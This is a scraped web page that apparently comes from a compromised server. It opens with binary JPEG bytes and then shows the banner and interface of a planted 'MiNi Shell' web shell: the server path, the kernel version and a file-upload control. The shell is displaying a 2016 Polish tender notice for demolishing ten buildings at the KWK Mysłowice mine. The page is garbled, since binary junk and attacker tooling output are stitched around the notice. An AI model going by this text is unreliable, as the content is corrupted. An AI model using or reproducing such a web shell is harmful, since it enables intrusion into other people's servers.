JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20160727/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20160727/162455-N-2016.html

<p class="kh_header"><b>Bytom: Wykonanie  prac związanych z rozbiórką  obiektów  budowlanych powierzchni       
            w  KWK Mysłowice :
Zadanie 1:  Budynek  posterunku dyżurnego.
Zadanie 2:  Magazyn gazów technicznych.
Zadanie 3:  Budynek  garaży obok Straży Pożarnej.
Zadanie 4:  Komora ćwiczeń ratowniczych.
Zadanie 5:  Budynek  garaży p. poż. Straży
Zadanie 6:   Budynek  stolarni.
Zadanie 7:Magazyn stolarni (dawna pralnia).
Zadanie 8:Łaźnia stara.
Zadanie 9:  Budynek  maskowni .
Zadanie 10:  Pomost  lampownia - na</b><br>
<b>Numer ogłoszenia: 162455 - 2016; data zamieszczenia: 27.07.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Spółka Restrukturyzacji Kopalń S.A. , ul. Strzelców Bytomskich 207, 41-914 Bytom, woj. śląskie, tel. 032 3513300, 3513301, 3513364, faks 032 3513309, -10, 3513369.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.srk.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednoosobowa Spółka Skarbu Państwa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie  prac związanych z rozbiórką  obiektów  budowlanych powierzchni       
            w  KWK Mysłowice :
Zadanie 1:  Budynek  posterunku dyżurnego.
Zadanie 2:  Magazyn gazów technicznych.
Zadanie 3:  Budynek  garaży obok Straży Pożarnej.
Zadanie 4:  Komora ćwiczeń ratowniczych.
Zadanie 5:  Budynek  garaży p. poż. Straży
Zadanie 6:   Budynek  stolarni.
Zadanie 7:Magazyn stolarni (dawna pralnia).
Zadanie 8:Łaźnia stara.
Zadanie 9:  Budynek  maskowni .
Zadanie 10:  Pomost  lampownia - na.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 2.	Zakres przedmiotu zamówienia: 
Obiekty budowlane przeznaczone do likwidacji usytuowane są na terenie SRK S.A. w Bytomiu Oddział w Mysłowicach KWK Mysłowice ul. Świerczyny 3.
  
2.1.	Dane  techniczne  obiektów  budowlanych. 

Zadanie 1 - Budynek  posterunku dyżurnego  -  wykonany metodą  tradycyjną . Budynek parterowy niepodpiwniczony składający się z dwóch  pomieszczeń - głównego i przedsionka. Ściany zewnętrzne i wewnętrzne wykonane z cegły, otynkowane. Dach o konstrukcji żelbetonowej i pokryty  papą  asfaltową  na lepiku, jednospadowy.  Posadowiony na ławie  fundamentowej. Ściany  fundamentowe wykonane  z cegły pełnej. Kubatura  budynku                               -  131,60 m3.

Zadanie 2 - Magazyn gazów technicznych  - konstrukcja budynku tradycyjna z cegły pełnej. Posadowiony na fundamentach żelbetonowych. Przy budynku znajdują się rampy transportowo - komunikacyjne, do których prowadzą schody zewnętrzne żelbetonowe. Więźba i dach                          o konstrukcji  stalowej  w postaci pięciu ram z kratownicami jako konstrukcją dachu . Ścianki działowe między pomieszczeniami z płyt żelbetonowych prefabrykowanych gr, 7 cm. Posadzki  betonowe, ściany  od zewnątrz jak i od wewnątrz otynkowane. Kubatura  budynku -  166,70 m3.               

Zadanie 3 - Budynek garaży obok Straży Pożarnej - budynek  składa się z siedmiu  boksów  garażowych. Konstrukcja tradycyjna  murowana z cegły pełnej  gr. 25  do 56 cm. Jest to budynek parterowy niepodpiwniczony. W  części  boksów  znajdują się  kanały serwisowe. Konstrukcja dachu jednospadowa, drewniana ,pokryta  papą  asfaltową. Obróbki  z blach stalowej  ocynkowanej. Posadowiony  na fundamencie  z cegły pełnej. Otwory bram wjazdowych  pozbawione wrót  garażowych. Kubatura  budynku - 200,90 m3.
                             
Zadanie 4 - Komora ćwiczeń ratowniczych -  konstrukcja budynku tradycyjna  murowana               z cegły pełnej. Jest to budynek parterowy z poddaszem użytkowym niepodpiwniczony.                        Na poddasze prowadzą schody zewnętrzne o konstrukcji stalowej przy  elewacji  południowej i zachodniej. Od strony południowej przed wejściem do pomieszczeń zabudowano wiatę                         o konstrukcji stalowej. Dach drewniany dwuspadowy, pokryty papą asfaltową. Strop nad parterem typu Kleina z zewnątrz wsparty na ścianach podłużnych , w środku na dwóch rzędach belek stalowych wspartych na słupach stalowych okrągłych. W części biurowej okna  drewniane  skrzynkowe , a pozostałej części budynku zamontowano ślusarkę stalową okienną i drzwiową. Obróbki blacharskie wykonane z blachy stalowej ocynkowanej.  Kubatura obiektu - 2706,00m3.

Zadanie 5 - Budynek garaży p. poż  Straży - konstrukcja  tradycyjna, murowana z cegły pełnej. Boksy  garażowe  w ilości 3 sztuk o zróżnicowanej wysokości. Dach  jednospadowy  betonowy  na belkach stalowych. Ściany z cegły  pełnej  o gr. 25 cm. Posadowione na fundamentach z cegły.  Bramy  wjazdowe drewniane  z  okuciami  metalowymi. Okna  stalowe. Pokrycie dachu z papy asfaltowej na lepiku . Kubatura budynku -760,00 m3. 

Zadanie 6 -  Budynek  stolarni -  konstrukcja tradycyjna z cegły pełnej cegły pełnej posadowiony na fundamencie ceglanym. Elewacja budynku otynkowana  tynkiem cementowo wapiennym. Ścianki  wewnętrzne  działowe  z cegły. Stropodach i strop  z płyt żelbetonowych. Posadzki cementowe  i z płytek  ceramicznych.  Dach pokryty papą  asfaltową. Stolarka okienna i drzwiowa  drewniana . Budynek  piętrowy nie  podpiwniczony. Przed  elewacją południową znajduje się dodatkowa  klatka  schodowa zewnętrzna  żelbetowa wsparta na dwóch słupach żelbetowych ,przy której znajduje się teren utwardzony  z murkiem  oporowym , który podlega likwidacji. Kubatura  budynku - 4500,00 m3.                 

Zadanie 7 - Magazyn stolarni (dawna pralnia) - konstrukcja tradycyjna  z cegły pełnej. Budynek parterowy niepodpiwniczony . Północna część budynku  styczna  do budynku stolarni. Konstrukcja dachu żelbetowa jednospadowa z pokryciem z  papy asfaltowej na lepiku. Ściany  budynku posadowione na fundamentach ceglanych .Posadzki  wykonane  na podłożu  betonowym z płytek lastriko. Kubatura budynku - 367,70m3.

Zadanie 8 -  Łaźnia stara -  budynek   składa się z części wyższej(łaźnia łańcuszkowa) oraz z części niższej gdzie mieściły się szatnie i prysznice, ponadto od strony zachodniej usytuowana jest przybudówka  w której mieściły się urządzenia wymiennikowni z instalacji co. Budynek wybudowany w konstrukcji mieszanej żelbetowej i murowanej z cegły pełnej gr. 38 cm. Jest to obiekt dwukondygnacyjny ze stropem żelbetowym. Stropodachy płaskie żelbetonowe wsparte na układzie belek i podciągów opartych na słupach żelbetowych. Stolarka okienna drewniana, drzwi i bramy stalowe. Od strony południowej przed budynkiem biegnie kanał  podziemny, który jest także przeznaczony do likwidacji. Kubatura budynku -  4 859,00 m3. 

Zadanie 9 - Budynek   maskowni  ( markowni) -  wykonany jest w technologii szkieletowej żelbetowej, ściany osłonowe wypełnione cegłą i gazobetonem o gr. 25 cm. Budynek jest dwupiętrowy przy czym w poziomie drugiego piętra na konstrukcji budynku opiera się konstrukcja będąca przedłużeniem pomostu komunikacyjnego tworząc konstrukcyjnie z nim jedną całość . Stropodach płaski w postaci płyty żelbetowej. Okna , bramy i drzwi stalowe. Klatka schodowa wewnętrzna żelbetowa. Na parterze znajdowały się pomieszczenia                      o charakterze warsztatowym, na I i II  piętrze pomieszczenia socjalno - biurowe. Dostęp do pomieszczeń na II piętrze oraz pomostu komunikacyjnego  z zewnętrznej klatki schodowej stanowiącej niezależną obudowaną konstrukcję na elewacji zachodniej  tegoż budynku. Klatka schodowa o konstrukcji murowanej z biegiem schodowym żelbetowym i naświetla z pustaków, dach płaski żelbetowy - przeznaczona do rozbiórki  z  budynkiem maskowni.
Zadanie 10 - Pomost lampownia - nadszybie - zasadniczą konstrukcję  pomostu komunikacyjnego każdego z przęseł stanowią dwie kratownice nośne oraz poprzecznice stropowe i dachowe wraz ze stężeniami połaciowymi i stropowymi . Konstrukcja  mostu  jest kratowa. Elementy składowe kratownicy to: pasy górne składające się z teownika 140 mm, oraz pasy dolne wykonane z układu dwu ceowników 200 mm. Słupki kratownicy wewnętrzne wykonano z ceownika  240 mm. I 100 HEA 180 . Krzyżulce wewnętrzne kratownicy wykonano z 2 x ceownik 200 w skrzynkę, lub 2L 125 x80 . Poprzeczne belki poziome stropu wykonane              z I 120, natomiast poprzecznice  wewnątrz polowe  z L 60. Podłoga mostu wykonana jest                        z prefabrykowanych  płyt żelbetowych gr. 12 cm. W poziomie podłogi wylewka cementowa gr, 8 cm. Dach z płyt prefabrykowanych żelbetowych dachowych ,pokryty  papą asfaltową  na  lepiku . Ściany z płyt  prefabrykowanych o gr. 20 cm. Naświetla ścienne o wys. 90 cm wykonane w postaci pasowej ze szkła płaskiego. Podpory  pomostu przegubowe wykonane z I 340,  lub I 500 mm  skratowane   2 x L 60  z poziomymi poprzeczkami wykonanymi  z 2 x L 120 mm.  

3.	Zakres  rzeczowy należy wykonać w oparciu o przedmiary robót stanowiące załączniki do SIWZ..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.11.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Oferta powinna być zabezpieczona wadium w wysokości: 22 000,00 zł (słownie: dwadzieścia dwa tysiące złotych 00/100)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>2.	Zamawiający uzna  warunek  w zakresie wiedzy i doświadczenia za spełniony, jeżeli Wykonawca wykaże się należytym wykonaniem robót budowlanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, w tym co najmniej jedną robotą budowlaną               w ramach jednej umowy polegającą na likwidacji (rozbiórki) budynków lub budowli na powierzchni w zakresie o wartości minimum tj. 400 000,00 zł brutto                                   wraz z dowodami dotyczącymi realizacji najważniejszych robót, określających                         czy roboty te zostały wykonane w sposób należyty oraz wskazujący, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. 
3.	Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych  innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia.
4.	Jeżeli Wykonawca, wykazując spełnianie warunku, o którym mowa w pkt. 5.1 SIWZ polega na zasobach innych podmiotów, w celu oceny, czy Wykonawca będzie dysponował zasobami innych podmiotów w trakcie realizacji zamówienia oraz oceny, czy stosunek łączący go z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, obowiązany jest przedłożyć dokumenty dotyczące:
1)	zakresu dostępnych Wykonawcy zasobów innego podmiotu,
2)	sposobu wykorzystania zasobów innego podmiotu przez Wykonawcę, przy wykonaniu zamówienia,
3)	charakteru stosunku, jaki będzie łączył Wykonawcę z innym podmiotem,
4)	zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.	Zamawiający uzna warunek w zakresie dysponowania osobami za spełniony, jeżeli Wykonawca wykaże, iż dysponuje osobami zdolnymi do realizacji zadania objętego zamówieniem w szczególności odpowiedzialnymi za świadczenie robót posiadającymi uprawnienia:
-	kierownika budowy uprawnienia budowlane w specjalności konstrukcyjno- budowlanej, aktualne zaświadczenie o przynależności do Okręgowej Izby Inżynierów Budownictwa oraz stwierdzenie  kwalifikacji przez organ nadzoru górniczego na osobę min. dozoru średniego ruchu w specjalności budowlanej                    w podziemnych zakładach górniczych wydobywających węgiel kamienny              (min. 1 osoba na zmianę).
-	Osoby wykonujące roboty spawalnicze powinny spełniać warunki Rozporządzenia Ministra Środowiska z dnia 15.12.2011r. w sprawie kwalifikacji w zakresie górnictwa i ratownictwa górniczego (min. 2 osoby).
co należy udokumentować w formie stosownego oświadczenia Wykonawcy załączonego do oferty, stwierdzającego, że osoby, które będą uczestniczyć                               w wykonywaniu zamówienia posiadają wymagane kwalifikacje i uprawnienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Oświadczenia Wykonawcy w trybie art. 44 ustawy Pzp w związku z art. 22 ust.1
ustawy Pzp zgodnie z pkt. 5.1. SIWZ - załączniki nr 2, 2a, 2b, 2c, 2d do druku OFERTA.
Wykonawca powołujący się przy wykazaniu spełniania warunków udziału  w postępowaniu w zakresie wiedzy i doświadczenia, potencjału technicznego, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów (załączniki nr 2a, 2b, 2c, 2d), zobowiązany jest uzyskać pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia, które należy dołączyć do załączników nr 2a, 2b, 2c, 2d do druku OFERTA. 
Wzór zobowiązania podmiotu trzeciego stanowi załącznik nr 2e do druku OFERTA.    
2.   Wykonawca w druku OFERTA - załącznik nr 1 do druku SIWZ zobowiązany jest złożyć zobowiązanie z tytułu gwarancji zgodnie z pkt. III ppkt.1. załącznika nr 2 do  SIWZ
3. Formularz cenowy stanowiący załącznik nr 8 do druku OFERTA.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Okres gwarancji - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, za wyjątkiem ustawowej zmiany obowiązującej stawki podatku od towarów i usług</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.srk.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SRK S.A. ul. Strzelców Bytomskich 207, 41-914 Bytom-30,00+VAT w przypadku odbioru osobistego (gotówka) lub pocztą (za zaliczeniem)- w przypadku pobrania SIWZ ze strony internetowej-bezpłatnie..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.08.2016 godzina 09:00, miejsce: Spółka Restrukturyzacji Kopalń S.A. 41-914 Bytom, ul. Strzelców Bytomskich 207 - sekretariat Spółki (II piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 16.	PODWYKONAWSTWO.
Zamawiający nie wprowadza żadnych ograniczeń odnośnie zakresu prac, których wykonanie Wykonawca zamierza powierzyć podwykonawcy.
1.	Powierzenie części zamówienia podwykonawcy:
1.	Wykonawca może powierzyć wykonanie części zamówienia podwykonawcy.
2.	Zamawiający żąda wskazania przez Wykonawcę w ofercie - Załącznik nr 5 - części zamówienia, której wykonanie zamierza powierzyć podwykonawcy lub podania przez Wykonawcę nazw (firm) podwykonawców, na których zasoby Wykonawca powołuje się na zasadach określonych w art. 26 ust. 2b, w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1.
3.	Jeżeli zmiana albo rezygnacja z podwykonawcy dotyczy podmiotu, na którego zasoby Wykonawca powoływał się, na zasadach określonych w art. 26 ust 2b, w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa 
w art. 22 ust. 1, Wykonawca jest obowiązany wykazać Zamawiającemu,                                                 iż proponowany inny podwykonawca lub Wykonawca samodzielnie, na dzień zgłoszenia zmiany, spełnia je w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia.
2.	Informacje dotyczące umowy o podwykonawstwo w przypadku zamówień na roboty budowlane:
1.	Wymagania dotyczące umowy o podwykonawstwo, których przedmiotem są roboty budowlane, których niespełnienie spowoduje zgłoszenie przez Zamawiającego odpowiednio zastrzeżeń lub sprzeciwu:
a)	termin zapłaty wynagrodzenia podwykonawcy lub dalszemu podwykonawcy nie może być dłuższy niż 30 dni od dnia doręczenia Wykonawcy, podwykonawcy lub dalszemu podwykonawcy faktury lub rachunku, potwierdzających wykonanie zleconej podwykonawcy lub dalszemu podwykonawcy dostawy, usługi lub roboty budowlanej.
2.	Informacje o umowach o podwykonawstwo, których przedmiotem są dostawy 
i usługi, które z uwagi na wartość lub przedmiot tych dostaw lub usług, nie podlegają obowiązkowi przedkładania Zamawiającemu, a których wartość stanowi 0,5% wartości w sprawie zamówienia publicznego, jednak do wartości nieprzekraczającej 50  000,00 zł,
3.	Wykonawca, podwykonawca lub dalszy podwykonawca zamówienia na roboty budowlane zamierzający zawrzeć umowę o podwykonawstwo, której przedmiotem są roboty budowlane, jest obowiązany, w trakcie realizacji zamówienia publicznego na roboty budowlane, do przedłożenia Zamawiającemu projektu tej umowy, przy czym podwykonawca lub dalszy podwykonawca jest obowiązany dołączyć zgodę Wykonawcy na zawarcie umowy o podwykonawstwo o treści zgodnej z projektem umowy.
4.	Projekt umowy winien zawierać co najmniej:
a)	zakres zamówienia powierzonego podwykonawcy lub dalszemu podwykonawcy,
b)	termin realizacji,
c)	obowiązki generalnego Wykonawcy,
d)	obowiązki podwykonawcy lub dalszego podwykonawcy,
e)	wysokość wynagrodzenia należnego podwykonawcy lub dalszemu podwykonawcy,
f)	termin i warunki zapłaty wynagrodzenia podwykonawcy lub dalszemu podwykonawcy,
5.	Zamawiający w terminie 7 dni od dnia otrzymania, zgłasza pisemne zastrzeżenia              do projektu umowy o podwykonawstwo, której przedmiotem są roboty budowlane                      i do projektu jej zmiany, niespełniającej wymagań określonych w SIWZ i gdy termin zapłaty wynagrodzenia jest dłuższy niż 30 dni od dnia doręczenia faktury lub rachunku potwierdzających wykonanie zleconej podwykonawcy lub dalszemu podwykonawcy dostawy, usługi lub roboty budowlanej.
